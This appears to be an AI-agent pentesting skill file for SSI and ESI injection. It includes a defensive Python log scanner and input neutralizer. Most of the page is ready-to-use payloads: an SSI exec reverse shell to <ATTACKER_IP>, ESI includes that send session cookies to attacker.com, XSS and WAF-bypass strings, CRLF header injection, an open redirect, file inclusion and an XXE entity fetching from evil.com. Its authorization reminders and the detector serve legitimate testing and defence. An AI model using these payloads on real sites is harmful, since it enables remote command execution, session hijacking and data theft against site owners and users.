Hacktricks-skills ssi-esi-injection

Detect and exploit Server Side Inclusion (SSI) and Edge Side Inclusion (ESI) injection vulnerabilities in web applications. Use this skill whenever you're doing web pentesting, testing for file inclusion vulnerabilities, cache poisoning attacks, or when you encounter .shtml/.shtm/.stm files, Surrogate-Control headers, or need to test for SSI/ESI injection points. This skill provides detection payloads, exploitation techniques, and methodology for SSI/ESI vulnerabilities.

install
source: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/server-side-inclusion-edge-side-inclusion-injection/SKILL.MD
source content

SSI/ESI Injection Testing

A comprehensive guide for detecting and exploiting Server Side Inclusion (SSI) and Edge Side Inclusion (ESI) injection vulnerabilities.

When to Use This Skill

  • Testing web applications for file inclusion vulnerabilities
  • When you see .shtml, .shtm, or .stm file extensions
  • When response headers contain Surrogate-Control: content="ESI/1.0"
  • During cache poisoning or CDN exploitation testing
  • When you need to bypass XSS filters or steal cookies
  • Testing for SSRF via ESI includes

Detection Methodology

Step 1: Identify SSI Presence

Look for these indicators:

  • File extensions: .shtml, .shtm, .stm
  • HTML comments in source containing <!--# directives
  • Server configuration that processes SSI

Step 2: Identify ESI Presence

Check for:

  • Response header: Surrogate-Control: content="ESI/1.0"
  • ESI tags being reflected or processed
  • CDN/cache layer in front of the application

Step 3: Test for Injection Points

Use the detection payloads below to test user-controllable input fields, URL parameters, and headers.
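The three steps above reduce to a few textual indicators: the Surrogate-Control header, the <!--#, <esi: and <!--esi tag openers, $(HTTP_...) variable lookups, and the .shtml/.shtm/.stm extensions. The following is an added example written for this page, not code from the skill or from HackTricks: it checks a response header map for an ESI-capable upstream, classifies a single decoded value, shows the output-encoding step that stops a directive from forming, and runs the same classifier over constructed access-log lines (documentation-range addresses, payloads taken from the page and URL-encoded as they would appear on the wire) so a defender can see which requests carried SSI/ESI syntax.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Tag openers an SSI or ESI processor acts on. Anchoring on the opener
# ("<!--#", "<esi:", "<!--esi") keeps ordinary text that merely mentions
# "esi" or "include" from being flagged.
SSI_DIRECTIVE = re.compile(
    r"<!--\s*#\s*(echo|printenv|set|include|flastmod|fsize|exec|config|if|elif|else|endif)\b",
    re.IGNORECASE,
)
ESI_TAG = re.compile(
    r"<esi:(include|assign|vars|debug|request_header|inline|remove|try|choose|when|otherwise)\b",
    re.IGNORECASE,
)
ESI_COMMENT = re.compile(r"<!--esi\b", re.IGNORECASE)
# $(HTTP_COOKIE), $(HTTP_COOKIE{'JSESSIONID'}) and similar request-variable lookups
ESI_VARIABLE = re.compile(r"\$\(\s*HTTP_\w+", re.IGNORECASE)
SSI_EXTENSIONS = (".shtml", ".shtm", ".stm")

# Combined log format (Apache/nginx); only the fields used below are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def esi_advertised(headers):
    """True when the response headers show an ESI-capable layer upstream,
    i.e. Surrogate-Control: content="ESI/1.0" (header name matched case-insensitively)."""
    return any(
        name.lower() == "surrogate-control" and "esi/1.0" in value.lower()
        for name, value in headers.items()
    )


def classify_value(value):
    """Return the sorted list of directive families present in one decoded value."""
    findings = []
    for label, pattern in (
        ("ssi-directive", SSI_DIRECTIVE),
        ("esi-tag", ESI_TAG),
        ("esi-comment", ESI_COMMENT),
        ("esi-variable", ESI_VARIABLE),
    ):
        if pattern.search(value):
            findings.append(label)
    return sorted(findings)


def neutralize(value):
    """Encode a user-supplied value before it is written into a response that an
    SSI or ESI processor will parse: '<' becomes '&lt;', so no directive opener
    can form. ESI only expands $(...) inside its own elements, so removing the
    opener is the step that matters."""
    return html.escape(value, quote=True)


def scan_access_log(lines):
    """Return (client_ip, path, findings) for each request whose path or query
    values contain SSI/ESI syntax, or whose path has an SSI-processed extension.
    Values are decoded twice because injected payloads are often double-encoded."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        candidates = [parts.path] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]
        findings = set()
        for raw in candidates:
            findings.update(classify_value(unquote(unquote(raw))))
        if parts.path.lower().endswith(SSI_EXTENSIONS):
            findings.add("ssi-served-extension")
        if findings:
            hits.append((m.group("ip"), parts.path, sorted(findings)))
    return hits


# Constructed sample log lines (not real traffic). Client and include addresses
# are documentation ranges; the payloads are the page's own detection strings.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=%3C%21--%23exec%20cmd%3D%22id%22%20--%3E HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /profile?name=hell%3C%21--esi--%3Eo HTTP/1.1" 200 133',
    '198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /about.shtml HTTP/1.1" 200 2048',
    '198.51.100.9 - - [10/Oct/2023:13:56:05 +0000] "GET /page?ref=%3Cesi:include%20src%3Dhttp://203.0.113.7/$(HTTP_COOKIE)%3E HTTP/1.1" 200 99',
    '192.0.2.44 - - [10/Oct/2023:13:57:12 +0000] "GET /search?q=esi+include+docs HTTP/1.1" 200 8004',
]

if __name__ == "__main__":
    for ip, path, findings in scan_access_log(SAMPLE_LOG):
        print(ip, path, ", ".join(findings))
```

The fifth constructed line ("esi include docs") produces no finding, which is the point of anchoring on tag openers rather than keywords; the .shtml hit is an inventory signal (SSI is being served) rather than an attack indicator, and is labelled separately so it can be routed differently.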

SSI Detection Payloads

Basic SSI Directives

<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DATE_LOCAL" -->
<!--#printenv -->
<!--#set var="name" value="Rich" -->

File Inclusion Tests

<!--#include virtual="/index.html" -->
<!--#include file="file_to_include.html" -->
<!--#include virtual="file_to_include.html" -->
<!--#flastmod file="index.html" -->

Command Execution Tests

<!--#exec cmd="dir" -->
<!--#exec cmd="ls" -->
<!--#exec cmd="whoami" -->
<!--#exec cmd="id" -->

Reverse Shell (Advanced)

<!--#exec cmd="mkfifo /tmp/foo;nc <ATTACKER_IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

ESI Detection Payloads

Basic Detection

hell<!--esi-->o

If the response reflects it as "hello" (the <!--esi--> comment was consumed rather than echoed back), an ESI processor is parsing the content and the application is vulnerable.

Blind Detection

<esi:include src=http://attacker.com>

Monitor your server for incoming requests.

Debug Detection (Akamai)

<esi:debug/>

ESI Exploitation Techniques

XSS via ESI

<esi:include src=http://attacker.com/xss.html>

Bypass XSS Filters

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

WAF Bypass with <!--esi-->

<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>

Cookie Theft

Remote Cookie Steal

<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />

Reflect HTTP_ONLY Cookies

<!--esi $(HTTP_COOKIE) -->
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

Private Local File Access

<esi:include src="secret.txt">

CRLF Injection

<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>

Open Redirect

<!--esi $add_header('Location','http://attacker.com') -->

Add Custom Headers

<!--esi/$add_header('Content-Type','text/html')/-->
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

CRLF in Headers (CVE-2019-2438)

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>

ESI + XSLT = XXE

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

With XSLT file:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>

ESI Software Capabilities

Software        Includes  Vars  Cookies  Upstream Headers  Host Whitelist
Squid3          Yes       Yes   Yes      Yes               No
Varnish Cache   Yes       No    No       Yes               Yes
Fastly          Yes       No    No       No                Yes
Akamai ETS      Yes       Yes   Yes      No                No
NodeJS esi      Yes       Yes   Yes      No                No
NodeJS nodesi   Yes       No    No       No                Optional

Testing Workflow

  1. Reconnaissance: Identify if the target uses SSI or ESI
  2. Detection: Test input fields with detection payloads
  3. Enumeration: Map out what directives are supported
  4. Exploitation: Use appropriate payloads based on capabilities
  5. Verification: Confirm successful exploitation

Safety Notes

  • Always have proper authorization before testing
  • Command execution payloads can be destructive
  • Cookie theft should only be done on systems you own or have permission to test
  • Document all findings for responsible disclosure
